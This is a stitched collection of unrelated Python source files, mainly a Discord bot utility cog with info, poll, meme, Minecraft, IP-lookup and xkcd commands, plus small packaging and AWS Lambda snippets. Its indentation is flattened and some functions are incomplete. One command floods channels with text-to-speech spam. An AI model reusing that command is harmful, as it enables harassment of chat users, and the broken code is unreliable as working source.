if i.type == discord.ChannelType.text:
chlist[1] += 1
else:
chlist[2] += 1
iurl = s.icon_url
s_reg = str(s.region)
r_embed = discord.Embed(color=random.randint(0, 256**3-1))
if iurl:
thing = {'url': iurl}
else:
thing = {}
r_embed.set_author(name=s.name, **thing, icon_url=(iurl if iurl else avatar_link))
r_embed.set_footer(text=str(target), icon_url=avatar_link)
if iurl:
r_embed.set_image(url=iurl)
r_embed.add_field(name='ID', value=s.id)
r_embed.add_field(name='Members', value=len(s.members))
r_embed.add_field(name='Channels', value=ch_fmt.format(*[str(i) for i in chlist]))
r_embed.add_field(name='Roles', value=len(s.roles))
r_embed.add_field(name='Custom Emojis', value=len(s.emojis))
r_embed.add_field(name='Region (Location)', value=str(s.region).replace('-', ' ').title().replace('Eu ', 'EU ').replace('Us ', 'US ').replace('Vip', 'VIP '))
r_embed.add_field(name='Owner', value=str(s.owner))
r_embed.add_field(name='Default Channel', value=f'<#{s.default_channel.id}>\n(#{s.default_channel.name})')
r_embed.add_field(name='Admins Need 2FA', value=('Yes' if s.mfa_level else 'No'))
r_embed.add_field(name='Verification Level', value=v_level_map[str(s.verification_level)])
await self.bot.say(embed=r_embed)
@commands.command(pass_context=True, aliases=['gm', 'goldmine', 'aboutme', 'me', 'about'])
async def info(self, ctx):
"""Get bot info.
Usage: info"""
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
ach = self.bot.get_all_channels()
chlist = [0, 0, 0]
for i in ach:
chlist[0] += 1
if i.type == discord.ChannelType.text:
chlist[1] += 1
else:
chlist[2] += 1
up = await self.bot.format_uptime()
ram = await self.bot.get_ram()
got_conversion = ram[0]
emb = discord.Embed(color=random.randint(0, 256**3-1))
emb.set_author(name=str(target), url='https://khronodragon.com/', icon_url=avatar_link)
emb.set_footer(text='Made in Python 3.6+ with Discord.py %s' % self.bot.lib_version, icon_url='https://upload.wikimedia.org/wikipedia/commons/thumb/c/c3/Python-logo-notext.svg/400px-Python-logo-notext.svg.png')
emb.add_field(name='Servers', value=len(self.bot.servers))
emb.add_field(name='Author', value='Dragon5232#1841')
emb.add_field(name='Uptime', value=up)
emb.add_field(name='Local Time', value=time.strftime(absfmt, time.localtime()))
emb.add_field(name='Git Revision', value=self.bot.git_rev)
emb.add_field(name='Cogs Loaded', value=len(self.bot.cogs))
emb.add_field(name='Command Calls', value=sum(self.bot.command_calls.values()))
emb.add_field(name='Memory Used', value=(str(round(ram[1], 1)) + ' MB (%s MiB)' % str(round(ram[2], 1))) if got_conversion else 'Couldn\'t fetch')
emb.add_field(name='Modules Loaded', value=len(self.bot.modules))
emb.add_field(name='Members Seen', value=len(list(self.bot.get_all_members())))
emb.add_field(name='Channels', value=ch_fmt.format(*[str(i) for i in chlist]))
emb.add_field(name='Custom Emojis', value=len(list(self.bot.get_all_emojis())))
emb.add_field(name='Commands', value=str(len(self.bot.commands)))
emb.add_field(name='ID', value=target.id)
if self.bot.user.id == '2<PASSWORD>':
emb.add_field(name='Invite Link', value='https://tiny.cc/goldbot')
await self.bot.say(home_broadcast, embed=emb)
@commands.cooldown(1, 2.95, type=commands.BucketType.server)
@commands.command(pass_context=True, aliases=['pong', 'delay', 'net', 'network', 'lag', 'netlag', 'latency'])
async def ping(self, ctx):
"""Ping, pong!
Usage: ping"""
begin_time = datetime.now()
msg = await self.bot.send_message(ctx.message.channel, '**Pong!** | I wonder how long this takes...')
await self.bot.edit_message(msg, '**Pong!** | I really do wonder...')
time_diff = datetime.now() - begin_time
await self.bot.edit_message(msg, '**Pong!** Responded in %sms.' % str(round((time_diff.total_seconds() / 2) * 1000, 2)))
@commands.command(pass_context=True, aliases=['ram', 'memory', 'usage', 'mem', 'musage'])
async def uptime(self, ctx):
"""Report the current uptime of the bot.
Usage: uptime"""
up = await self.bot.format_uptime()
ram = await self.bot.get_ram()
got_conversion = ram[0]
ram_final = (' RAM usage is **' + str(round(ram[1], 1)) + ' MB (%s MiB)**.' % str(round(ram[2], 1))) if got_conversion else ''
await self.bot.say(ctx.message.author.mention + ' I\'ve been up for **' + up + '**.' + ram_final)
@commands.command(pass_context=True, aliases=['link', 'invlink', 'addbot', 'botadd'])
async def invite(self, ctx, *rids: str):
"""Generate an invite link for myself or another bot.
Usage: invite {optional: bot ids}"""
ids = list(rids)
msg = []
if not ids:
ids.append(self.bot.user.id)
for iid in ids:
try:
int(iid)
if len(iid) in range(16, 20):
if iid == self.bot.user.id:
msg.append('https://discordapp.com/api/oauth2/authorize?client_id={}&scope=bot&permissions={}'.format(iid, self.bot.perm_mask))
else:
msg.append('https://discordapp.com/api/oauth2/authorize?client_id=%s&scope=bot&permissions=3072' % iid)
else:
msg.append('**Invalid ID **`%s`** (must be 18 numbers)!**' % iid)
except ValueError:
msg.append('**Invalid ID **`%s`** (must be made of numbers)!**' % iid)
if msg:
await self.bot.say('\n'.join(msg))
@commands.command(aliases=['homeland', 'web', 'website', 'webpage'])
async def home(self):
"""Get the link to my homeland.
Usage: home"""
await self.bot.say(home_broadcast)
async def poll_task(self, emojis, msg, poll_table):
while True:
fnr = await self.bot.wait_for_reaction(emoji=emojis, message=msg, check=lambda r, a: not a == msg.server.me)
r = fnr.reaction
if fnr.user not in poll_table[str(r.emoji)]:
poll_table[str(r.emoji)].append(fnr.user)
@commands.cooldown(1, 5, type=commands.BucketType.user)
@commands.command(pass_context=True)
async def poll(self, ctx, *rquestion: str):
"""Start a public poll with reactions.
Usage: poll [emojis] [question] [time in seconds]"""
async def cem_help(emojis, raw_c_emojis, cem_map, c_emojis):
"""Custom emoji helper."""
if raw_c_emojis:
try:
for i in ctx.message.server.emojis:
cem_map[str(i)] = i
except AttributeError:
return
for i in raw_c_emojis:
try:
c_emojis.append(cem_map[i])
except KeyError:
await self.bot.say('**Custom emoji `%s` doesn\'t exist!**' % i)
return
emojis += c_emojis
question = ''
if rquestion:
question = ' '.join(rquestion)
else:
await self.bot.say('**You must specify a question!**')
return
stime = 0.0
cem_map = {}
highpoints = None
try:
stime = float(rquestion[-1:][0])
except ValueError:
await self.bot.say('**You must provide a valid poll time!**')
return
_question = question.split()
del _question[-1:]
question = ' '.join(_question)
try: # UCS-4
highpoints = re.compile(u'[\U00010000-\U0010ffff\u2615]')
except re.error: # UCS-2
highpoints = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
u_emojis = re.findall(highpoints, question)
raw_c_emojis = re.findall(re.compile(r'<:[a-z]+:[0-9]{18}>', flags=re.IGNORECASE), question)
c_emojis = []
emojis = u_emojis
await cem_help(emojis, raw_c_emojis, cem_map, c_emojis)
emojis = list(OrderedDict.fromkeys(emojis))
for ri in emojis:
i = str(ri)
question = question.replace(' ' + i, '')
question = question.replace(i + ' ', '')
question = question.replace(i, '')
question = question.strip()
if not emojis:
await self.bot.say('**You must specify some emojis!**')
return
elif len(emojis) < 2:
await self.bot.say('**You need at least 2 emojis to poll!**')
return
msg_key = ctx.message.author.mention + ' is now polling:\n \u2022 ' + question + '\n'
msg = await self.bot.say(msg_key + '**POLL NOT ACTIVE YET, ADDING REACTIONS.**')
for emoji in emojis:
await self.bot.add_reaction(msg, emoji)
await asyncio.sleep(0.14)
await self.bot.edit_message(msg, msg_key + '**POLL IS NOW ACTIVE. Give it a vote!**')
emojis = list(emojis)
poll_table = OrderedDict((str(i), []) for i in emojis)
task = self.loop.create_task(self.poll_task(emojis, msg, poll_table))
await asyncio.sleep(stime)
task.cancel()
_vote_table = {i: len(poll_table[i]) for i in poll_table}
vote_table = OrderedDict(reversed(sorted(_vote_table.items(), key=lambda t: t[1])))
_totals = '\n'.join([str(i) + ': {0} votes'.format(str(vote_table[i])) for i in vote_table])
winner = max(vote_table, key=vote_table.get)
await self.bot.say('**Poll time is over, stopped! Winner is...** ' + str(winner) + '\nResults were:\n' + _totals)
await self.bot.edit_message(msg, msg_key + '**POLL HAS ALREADY FINISHED.**')
#await self.bot.say('VT `' + str(vote_table) + '`')
@commands.command(aliases=['sw'], pass_context=True)
async def stopwatch(self, ctx):
"""A stopwatch for your convenience."""
author = ctx.message.author
        if author.id not in self.stopwatches:
self.stopwatches[author.id] = int(time.perf_counter())
await self.bot.say(author.mention + ' Stopwatch started!')
else:
tmp = abs(self.stopwatches[author.id] - int(time.perf_counter()))
tmp = str(timedelta(seconds=tmp))
await self.bot.say(author.mention + ' Stopwatch stopped! Time: **' + tmp + '**')
self.stopwatches.pop(author.id, None)
@commands.command(pass_context=True, name='id', aliases=['myid', 'sid', 'serverid'])
async def _id(self, ctx):
"""Get all the current scope IDs."""
fmt = '''**ID Party!**
Server ID: `{0.server.id}` (same as default channel ID and @\u200beveryone role ID!)
Channel ID: `{0.channel.id}`
Your ID: `{0.author.id}`
Server Owner\'s ID: `{0.server.owner.id}`
**You can also look up the ID of other people with** `{1.prefix}user [name / id / mention]`**.**'''
if not ctx.message.server:
class C:
id = 'Not applicable'
ctx.message.server = C
await self.bot.say(fmt.format(ctx.message, ctx))
@commands.command(pass_context=True, aliases=['memegen'], hidden=True)
async def meme(self, ctx, *, pre_text: str):
"""Generate a meme!
Usage: meme [top text] [bottom text]"""
char_table = {
'-': '--',
'_': '__',
'?': '~q',
'%': '~p',
'#': '~h', # TODO: make
'/': '~s',
'"': "''",
'\n': ' '
}
for key in char_table:
pre_text = pre_text.replace(key, char_table[key])
        # Assumption: the top/bottom split marker was originally a run of spaces; a
        # double space is used here so the single-space replace below is not a no-op.
        pre_text = pre_text.replace('  ', '__bottom__')
        pre_text = pre_text.replace(' ', '-')
if '__bottom__' in pre_text:
segments = pre_text.split('__bottom__')
else:
segments = textwrap.wrap(pre_text, width=int(len(pre_text) / 2))
async with aiohttp.ClientSession(loop=asyncio.get_event_loop()) as session:
with async_timeout.timeout(10):
async with session.get('https://memegen.link/api/templates/') as r:
rtext = await r.text()
templates = list(json.loads(rtext).values())
rtemp = random.choice(templates)
meme_url = rtemp + '/' + segments[0] + '/' + segments[1] + '.jpg'
async with session.get(meme_url) as r:
raw_image = await r.read()
await self.bot.send_file(ctx.message.channel, fp=BytesIO(raw_image), filename='meme.jpg')
@commands.command(pass_context=True, aliases=['statistics', 'servers', 'channels', 'members', 'users', 'seen'])
async def stats(self, ctx):
"""Dump some of my stats. Full version = info command.
Usage: stats"""
fmt = '''{0.author.mention} Here are my stats: (get even more with `{1}info`!)
**Servers**: {2}
**Channels**: {3}
**Members**: {4}
**Uptime**: {5}'''
up = await self.bot.format_uptime()
await self.bot.say(fmt.format(ctx.message, ctx.prefix,
len(self.bot.servers),
sum(len(s.channels) for s in self.bot.servers),
sum(len(s.members) for s in self.bot.servers),
up))
@commands.command(aliases=['randcolor', 'randc', 'rc', 'randomcolor', 'colorgen', 'gcolor', 'gencolor', 'randcolour', 'randomcolour', 'colourgen', 'gcolour', 'gencolour'])
async def rcolor(self):
"""Generate a random color.
Usage: rcolor"""
col_rgb = [random.randint(1, 255) for i in range(0, 3)]
col_str = '0x%02X%02X%02X' % (col_rgb[0], col_rgb[1], col_rgb[2])
await self.bot.say(embed=discord.Embed(color=int(col_str, 16), title='Hex: ' + col_str.replace('0x', '#') + ' | RGB: ' + ', '.join([str(c) for c in col_rgb]) + ' | Integer: ' + str(int(col_str, 16))))
@commands.command(aliases=['character', 'char', 'cinfo', 'unicode'])
async def charinfo(self, *, uchars: str):
"""Get the Unicode info for a character or characters.
Usage: charinfo [character(s)]"""
no_preview = [
'\u0020',
'\uFEFF'
]
cinfo = commands.Paginator(prefix='', suffix='', max_size=(1999 if self.bot.selfbot else 2000))
for char in list(uchars.replace('\n', '')):
hexp = str(hex(ord(char))).replace('0x', '').upper()
while len(hexp) < 4:
hexp = '0' + hexp
preview = f' (`{char}`)'
cinfo.add_line(f'U+{hexp} {unicodedata.name(char)} {char}' + (preview if char not in no_preview else ''))
if len(cinfo.pages) > 5:
await self.bot.say('Too long, trimming to 5 pages.')
for page in cinfo.pages[0:5]:
await self.bot.say(page)
@commands.command()
async def encode(self, *, content: str):
"""Encode your text into Goldmine's encoding!
Usage: encode [text]"""
await self.bot.say('```' + (b_encode(content)) + '```')
@commands.command()
async def decode(self, *, content: str):
"""Decode your text from Goldmine's encoding!
Usage: decode [encoded text]"""
await self.bot.say('```' + (b_decode(content)) + '```')
@commands.cooldown(1, 6.75, type=commands.BucketType.user)
@commands.command(pass_context=True, aliases=['mc'])
async def minecraft(self, ctx, *, server_ip: str):
"""Get information about a Minecraft server.
Usage: minecraft [server address]"""
port = 25565
port_split = server_ip.split(':')
server = port_split[0].replace('/', '')
if len(port_split) > 1:
try:
port = int(port_split[1])
except ValueError:
pass
if ('.' not in server) or (' ' in server_ip):
await self.bot.say(':warning: Invalid address.')
return
try:
self.logger.info('Connecting to Minecraft server ' + server + ':' + str(port) + '...')
with async_timeout.timeout(5):
data = await self.loop.run_in_executor(None, mclib.get_info, server, port)
except Exception as e:
await self.bot.send_message(ctx.message.channel, f':warning: Couldn\'t get server info for `{server}:{port}`.')
return
desc = ''
server_type = 'Vanilla'
def decode_extra_desc():
final = []
format_keys = {
'bold': '**',
'italic': '*',
'underlined': '__',
'strikethrough': '~~'
}
for e in data['description']['extra']:
item = e['text']
for fkey in format_keys:
if e.get(fkey, False):
int_key = '%{f:' + fkey + '}$'
item = int_key + item + int_key
final.append(item)
final = ''.join(final)
for fkey in format_keys:
int_key = '%{f:' + fkey + '}$'
final = final.replace(int_key * 3, '').replace(int_key * 2, '')
final = final.replace(int_key, format_keys[fkey])
return final
if isinstance(data['description'], dict):
if 'text' in data['description']:
if data['description']['text']:
desc = data['description']['text']
else:
desc = decode_extra_desc()
else:
desc = decode_extra_desc()
elif isinstance(data['description'], str):
desc = data['description']
else:
desc = str(data['description'])
def decode_section_code():
            formats = {
                'l': '**',
                'n': '__',
                'o': '*',
                'k': '',
                'm': '~~',
                'r': ''
            }  # k = obf (no Markdown equivalent), r = reset
state = ''
desc = re.sub(r'\u00a7[4c6e2ab319d5f780lnokmr]', '', desc)
rc = random.randint(0, 256**3-1)
emb = discord.Embed(title=server + ':' + str(port), description=desc, color=rc)
try:
target = ctx.message.server.me
except AttributeError:
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
emb.set_footer(text=target.name, icon_url=avatar_link)
emb.add_field(name='Players', value=str(data['players']['online']) + '/' + str(data['players']['max']))
if data['players'].get('sample', False):
content = re.sub(r'\u00a7[4c6e2ab319d5f78lnokmr]', '', smartjoin([p['name'] for p in data['players']['sample']]))
if len(content) <= 1024:
emb.add_field(name='Players Online', value=content)
else:
pages = textwrap.wrap(content, width=1024)
for page in pages:
emb.add_field(name='Players Online', value=page)
emb.add_field(name='Version', value=re.sub(r'\u00a7[4c6e2ab319d5f78lnokmr]', '', data['version']['name']))
emb.add_field(name='Protocol Version', value=data['version']['protocol'])
if 'modinfo' in data:
if 'modList' in data['modinfo']:
if data['modinfo']['modList']:
content = smartjoin([m['modid'].title() + ' ' +
m['version'] for m in data['modinfo']['modList']])
if len(content) <= 1024:
emb.add_field(name='Mods', value=content)
else:
pages = textwrap.wrap(content, width=1024)
for page in pages:
emb.add_field(name='Mods', value=page)
else:
emb.add_field(name='Use of Mods', value='This server appears to fake its identity, so Forge clients will send their mod list.')
if data['modinfo'].get('type', False):
t = data['modinfo']['type']
if t.lower() == 'fml':
server_type = 'Forge / FML'
else:
server_type = t.title()
emb.add_field(name='Server Type', value=server_type)
emb.add_field(name='Ping', value=str(round(data['latency_ms'], 2)) + 'ms')
await self.bot.say(embed=emb)
@commands.cooldown(1, 20, type=commands.BucketType.user)
@commands.command(pass_context=True)
async def contact(self, ctx, *, message: str):
"""Contact the bot owner with a message.
Usage: contact [message]"""
for m in ctx.message.mentions:
message = message.replace(m.mention, '@' + str(m))
msg_object = {
'message': message,
'user': str(ctx.message.author),
'nick': ctx.message.author.display_name,
'message_id': ctx.message.id,
'user_id': ctx.message.author.id,
'channel_id': ctx.message.channel.id,
'pm': ctx.message.channel.is_private,
'time': str(ctx.message.timestamp),
'timestamp': ctx.message.timestamp.timestamp(),
'contains_mention': bool(ctx.message.mentions),
}
if ctx.message.server:
msg_object.update({
'server': ctx.message.server.name,
'server_id': ctx.message.server.id,
'server_members': len(ctx.message.server.members),
'channel': ctx.message.channel.name
})
self.bot.store['owner_messages'].append(msg_object)
await self.bot.say(':thumbsup: Message recorded.')
@commands.command(pass_context=True, aliases=['randomprofle', 'randomprof', 'rprof', 'rp', 'randp'])
async def rprofile(self, ctx):
"""Get a random profile.
Usage: rprofile"""
name_overrides = {
'cvv': 'CVV',
'cid': 'CID'
}
excluded = ['password', 'sexual_orientation', 'avatar', 'identifier', 'title',
'language', 'paypal', 'worldview', 'views_on', 'political_views',
'surname']
if not ctx.message.author.avatar_url:
ctx.message.author.avatar_url = ctx.message.author.default_avatar_url
emb = discord.Embed(color=random.randint(1, 255**3-1))
emb.set_author(name=ctx.message.author.display_name, icon_url=ctx.message.author.avatar_url)
p = elizabeth.Personal()
traits = {}
calls = {d: getattr(p, d) for d in dir(p) if (not d.startswith('_')) and hasattr(getattr(p, d), '__call__')}
for call in calls:
if call not in excluded:
if call in name_overrides:
f_name = name_overrides[call]
else:
f_name = call.replace('_', ' ').title()
traits[f_name] = calls[call]()
emb.set_thumbnail(url=p.avatar())
emb.title = traits['Full Name'].split()[0]
for trait in traits:
emb.add_field(name=trait, value=str(traits[trait]))
await self.bot.say(embed=emb)
@commands.cooldown(1, 5.75, type=commands.BucketType.user)
@commands.command(pass_context=True, aliases=['qr', 'makeqr', 'qrmake'])
async def qrcode(self, ctx, *, text: str):
"""Create a QR code.
Usage: qrcode [text to use]"""
img_bytes = BytesIO()
image = await self.loop.run_in_executor(None, qrcode.make, text)
image.save(img_bytes, format='PNG')
img_bytes.seek(0)
await self.bot.send_file(ctx.message.channel, img_bytes, filename='qrcode.png')
@commands.command()
async def avatar(self, *, target: discord.User):
"""Get someone's avatar.
Usage: avatar [member]"""
au = target.avatar_url
await self.bot.say(au if au else target.default_avatar_url)
@commands.command(pass_context=True)
async def ocr(self, ctx):
"""OCR an image.
Usage: ocr [attach an image]"""
or_check_perms(ctx, ('bot_owner',))
if not have_pil:
await self.bot.say('The bot owner hasn\'t set up this feature!')
return False
warnings.simplefilter('error', Image.DecompressionBombWarning)
if ctx.message.attachments:
with async_timeout.timeout(5):
async with aiohttp.request('GET', ctx.message.attachments[0]['url']) as r:
raw_image = await r.read()
else:
await self.bot.say(':warning: No attachment found.')
return
img_bytes = BytesIO(raw_image)
image = Image.open(img_bytes)
text = tesserocr.image_to_text(image)
if text:
await self.bot.say(text)
else:
await self.bot.say('No results.')
@commands.command(aliases=['cm_discrim'])
async def discrim(self, *, discriminator: str):
"""Look up users by discriminator.
Usage: discrim [discriminator]"""
d = discriminator
targets = list(set(str(m) for m in self.bot.get_all_members() if m.discriminator == d))
if targets:
await self.bot.say('**I found: **\n' + '\n'.join(targets))
else:
await self.bot.say('I found no matches. Maybe I\'m not in a server with them?')
@commands.command(pass_context=True, aliases=['perms'])
async def permissions(self, ctx):
"""Get your permissions here.
Usage: permissions"""
perms = ['**' + k[0].replace('_', ' ').title() + '**' for k in list(ctx.message.author.permissions_in(ctx.message.channel)) if k[1]]
if '**Administrator**' in perms:
perms.remove('**Administrator**')
perms.append('be an **administrator**')
if '**Send Tts Messages**' in perms:
perms[perms.index('**Send Tts Messages**')] = '**Send TTS Messages**'
await self.bot.say('You can ' + smartjoin(perms) + '!')
@commands.group(pass_context=True, name='xkcd')
async def cmd_xkcd(self, ctx):
"""Get a xkcd comic.
Usage: xkcd {stuff}"""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
@commands.cooldown(1, 4, type=commands.BucketType.user)
@cmd_xkcd.command(name='random')
async def xkcd_random(self):
"""Get a random comic from xkcd.
Usage: xkcd random"""
comic = await xkcd.random_comic()
emb = discord.Embed(color=random.randint(1, 255**3-1), title=comic.title)
emb.set_image(url=comic.image_link)
emb.set_footer(text=comic.alt_text)
await self.bot.say(embed=emb)
@commands.cooldown(1, 4, type=commands.BucketType.user)
@cmd_xkcd.command(name='latest')
async def xkcd_latest(self):
"""Get the latest comic from xkcd.
Usage: xkcd latest"""
comic = await xkcd.latest_comic()
emb = discord.Embed(color=random.randint(1, 255**3-1), title=comic.title)
emb.set_image(url=comic.image_link)
emb.set_footer(text=comic.alt_text)
await self.bot.say(embed=emb)
@commands.cooldown(1, 4, type=commands.BucketType.user)
@cmd_xkcd.command(name='number')
async def xkcd_number(self, number: int):
"""Get the Nth comic from xkcd.
Usage: xkcd number [number]"""
try:
comic = await xkcd.get_comic(number)
except xkcd.InvalidComic:
await self.bot.say(':warning: That comic doesn\'t exist.')
return
emb = discord.Embed(color=random.randint(1, 255**3-1), title=comic.title)
emb.set_image(url=comic.image_link)
emb.set_footer(text=comic.alt_text)
await self.bot.say(embed=emb)
@commands.command(aliases=['zws', 'u200b', '200b'])
async def zwsp(self, number: int=1):
"""Output a number of ZWSPs.
Usage: zwsp {number = 1}"""
if number > 2000:
await self.bot.say('I can\'t give you more than 2000 ZWSPs.')
elif number > 0:
await self.bot.say('\u200b' * number)
else:
await self.bot.say('I can\'t give you zero ZWSPs.')
@commands.command()
async def b64decode(self, *, b64: str):
"""Decode some base64 data.
Usage: b64decode [base64]"""
br = base64.b64decode(b64)
try:
m = br.decode('utf-8')
except ValueError:
m = '```' + str(br)[2:][:-1] + '```'
await self.bot.say(m)
@commands.command()
async def b64encode(self, *, b64: str):
"""Encode some base64 data.
Usage: b64encode [base64]"""
br = base64.b64encode(b64.encode('utf-8'))
try:
m = br.decode('utf-8')
except ValueError:
m = '```' + str(br)[2:][:-1] + '```'
await self.bot.say(m)
@commands.command(pass_context=True, aliases=['ttsspam', 'tts_spam'])
async def ttspam(self, ctx, *, text: str):
"""Spam a message with TTS. **This may get you banned from servers.**
Usage: ttspam [message]"""
or_check_perms(ctx, ('manage_messages',))
m = await self.bot.say(textwrap.wrap((text + ' ') * 2000, width=2000)[0], tts=True)
await asyncio.sleep(0.1)
await self.bot.delete_message(m)
@commands.command(pass_context=True, aliases=['ip', 'rdns', 'reverse_dns', 'reversedns'])
async def ipinfo(self, ctx, *, ip: str):
"""Get the GeoIP and rDNS data for an IP.
Usage: ipinfo [ip/domain]"""
emb = discord.Embed(color=random.randint(1, 255**3-1))
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
emb.set_author(icon_url=avatar_link, name='IP Data')
async with aiohttp.ClientSession(loop=self.loop) as sess:
with async_timeout.timeout(5):
async with sess.get('https://freegeoip.net/json/' + ip) as r:
data_res = await r.json()
rdns = 'Failed to fetch'
try:
with async_timeout.timeout(6):
rdns = (await self.loop.run_in_executor(None, socket.gethostbyaddr, data_res['ip']))[0]
except Exception:
pass
emb.add_field(name='IP', value=data_res['ip'])
emb.add_field(name='Reverse DNS', value=rdns)
emb.add_field(name='Country', value=data_res['country_name'] + ' (%s)' % data_res['country_code'])
region_val = data_res['region_name'] + ' (%s)' % data_res['region_code']
emb.add_field(name='Region', value=(region_val if region_val != ' ()' else 'Not specified'))
emb.add_field(name='City', value=(data_res['city'] if data_res['city'] else 'Not specified'))
emb.add_field(name='ZIP Code', value=(data_res['zip_code'] if data_res['zip_code'] else 'Not specified'))
emb.add_field(name='Timezone', value=(data_res['time_zone'] if data_res['time_zone'] else 'Not specified'))
emb.add_field(name='Longitude', value=data_res['longitude'])
emb.add_field(name='Latitude', value=data_res['latitude'])
emb.add_field(name='Metro Code', value=(data_res['metro_code'] if data_res['metro_code'] != 0 else 'Not specified'))
await self.bot.send_message(ctx.message.channel, embed=emb)
@commands.command()
async def dial(self, *, number: str):
"""Dial someone on the phone!
Usage: dial [phone number]"""
self.logger.info('Dialing ' + number + '...')
await self.bot.say(':telephone: **Dialing {}...**'.format(number))
await asyncio.sleep((random.randint(1, 3) + random.uniform(0, 1)) * random.uniform(0.4, 1.6) + random.uniform(0, 1))
await self.bot.say('**No answer.**')
@commands.command(aliases=['define'])
async def urban(self, *, term: str):
"""Define something, according to Urban Dictionary.
Usage: urban [term]"""
async with aiohttp.ClientSession(loop=self.loop) as sess:
with async_timeout.timeout(5):
async with sess.get('http://api.urbandictionary.com/v0/define', params={'term': term}) as r:
data_res = await r.json()
try:
word = data_res['list'][0]
except IndexError:
await self.bot.say('No results.')
return
target = self.bot.user
au = target.avatar_url
avatar_link = (au if au else target.default_avatar_url)
emb = discord.Embed(color=random.randint(0, 255**3-1), title=word['word'])
emb.set_author(name='U<NAME>', url=word['permalink'], icon_url='https://images.discordapp.net/.eJwFwdsNwyAMAMBdGICHhUPIMpULiCAlGIHzUVXdvXdf9cxLHeoUGeswJreVeGa9hCfVoitzvQqNtnTi25AIpfMuXZaBDSM4G9wWAdA5vxuIAQNCQB9369F7a575pv7KLUnjTvOjR6_q9wdVRCZ_.BorCGmKDHUzN6L0CodSwX7Yv3kg')
emb.set_footer(text=datetime.now().strftime(absfmt))
definition = word['definition']
if definition:
def_pages = textwrap.wrap(definition, width=1024)
for pg in def_pages[:3]:
emb.add_field(name='Definition', value=pg, inline=False)
else:
emb.add_field(name='Definition', value='None?!?!', inline=False)
example = word['example']
if example:
ex_pages = textwrap.wrap(example, width=1024)
for pg in ex_pages[:3]:
emb.add_field(name='Example', value=pg, inline=False)
else:
emb.add_field(name='Example', value='None?!?!', inline=False)
emb.add_field(name='👍', value=word['thumbs_up'])
emb.add_field(name='👎', value=word['thumbs_down'])
await self.bot.say(embed=emb)
    @commands.command(pass_context=True, aliases=['nickname', 'setnick'])
    async def nick(self, ctx, *, nick: str):
"""Set your nickname.
Usage: nick [new nickname]"""
if ctx.message.author.server_permissions.change_nickname:
await self.bot.change_nickname(ctx.message.author, nick)
await self.bot.say('Done! :thumbsup:')
else:
await self.bot.say(':thumbsdown: You don\'t have the permission to change your nickname. Contact an admin.')
@commands.command()
async def bleach(self):
"""Get some bleach. NOW.
Usage: bleach"""
emb = discord.Embed(color=random.randint(0, 255**3-1), title='Bleach')
emb.set_image(url='https://upload.wikimedia.org/wikipedia/commons/d/d3/Clorox_Bleach_products.jpg')
await self.bot.say(embed=emb)
@commands.command()
async def mcskin(self, *, username: str):
"""Get a Minecraft player's skin.
Usage: mcskin [username]"""
un = username.replace('\u200b', '').replace('/', '').replace('\u200e', '')
if not re.match(r'^[a-zA-Z0-9_]+$', un):
await self.bot.say(':warning: Invalid username.')
return
emb = discord.Embed(color=random.randint(0, 255**3-1), title=un + "'s skin")
emb.set_image(url='https://mcapi.ca/skin/' + un + '/150/true')
await self.bot.say(embed=emb)
@commands.command()
async def mchead(self, *, username: str):
"""Get a Minecraft player's head.
Usage: mchead [username]"""
un = username.replace('\u200b', '').replace('/', '').replace('\u200e', '')
if not re.match(r'^[a-zA-Z0-9_]+$', un):
await self.bot.say(':warning: Invalid username.')
return
emb = discord.Embed(color=random.randint(0, 255**3-1), title=un + "'s head")
emb.set_image(url='https://mcapi.ca/avatar/' + un + '/150/true')
await self.bot.say(embed=emb)
def setup(bot):
c = Utility(bot)
bot.add_cog(c)
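
# Loading sketch: with a discord.py 0.16-style bot this cog is loaded as an extension,
# e.g. bot.load_extension('cogs.utility') -- the dotted module path is hypothetical
# and depends on where this file actually lives in the bot's source tree.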
| StarcoderdataPython |
3310068 | from ._JSONError import JSONError
class JSONPropertyError(JSONError):
"""
Base class for all errors involving JSON properties.
"""
pass
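
# Sketch of how concrete property errors would build on this base class
# (the subclass name below is hypothetical, not part of the package):
#
# class JSONPropertyMissingError(JSONPropertyError):
#     """Raised when a required JSON property is absent."""
#     pass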
| StarcoderdataPython |
169975 | <filename>src/setup.py
from setuptools import setup, find_packages
setup(
name='pyschedule',
version='0.2.34',
description='A python package to formulate and solve resource-constrained scheduling problems',
url='https://github.com/tpaviot/pyschedule',
author='<NAME>',
author_email='<EMAIL>',
license='Apache 2.0',
packages=find_packages(),
install_requires=['pulp'],
include_package_data=True
)
| StarcoderdataPython |
1626006 | <gh_stars>0
import inspect
from typing import Any, Dict, Union
import aft_common.aft_utils as utils
import boto3
from boto3.session import Session
logger = utils.get_logger()
def persist_metadata(
payload: Dict[str, Any], account_info: Dict[str, str], session: Session
) -> Dict[str, Any]:
logger.info("Function Start - persist_metadata")
account_tags = payload["account_request"]["account_tags"]
account_customizations_name = payload["account_request"][
"account_customizations_name"
]
metadata_table_name = utils.get_ssm_parameter_value(
session, utils.SSM_PARAM_AFT_DDB_META_TABLE
)
item = {
"id": account_info["id"],
"email": account_info["email"],
"account_name": account_info["name"],
"account_creation_time": account_info["joined_date"],
"account_status": account_info["status"],
"account_level_tags": account_tags,
"account_customizations_name": account_customizations_name,
"parent_ou": account_info["parent_id"],
"vcs_information": {},
"terraform_workspace": {},
}
logger.info("Writing item to " + metadata_table_name)
logger.info(item)
response = utils.put_ddb_item(session, metadata_table_name, item)
logger.info(response)
return response
def lambda_handler(
event: Dict[str, Any], context: Union[Dict[str, Any], None]
) -> Dict[str, Any]:
try:
logger.info("AFT Account Provisioning Framework Handler Start")
rollback = None
try:
if event["rollback"]:
rollback = True
except KeyError:
pass
payload = event["payload"]
action = event["action"]
session = boto3.session.Session()
if action == "persist_metadata":
account_info = payload["account_info"]["account"]
update_metadata = persist_metadata(payload, account_info, session)
return update_metadata
else:
            raise Exception(
                f"Incorrect Command Passed to Lambda Function. Input: {action}. Expected: 'persist_metadata'"
            )
except Exception as e:
message = {
"FILE": __file__.split("/")[-1],
"METHOD": inspect.stack()[0][3],
"EXCEPTION": str(e),
}
logger.exception(message)
raise
if __name__ == "__main__":
import json
import sys
from optparse import OptionParser
logger.info("Local Execution")
parser = OptionParser()
parser.add_option(
"-f", "--event-file", dest="event_file", help="Event file to be processed"
)
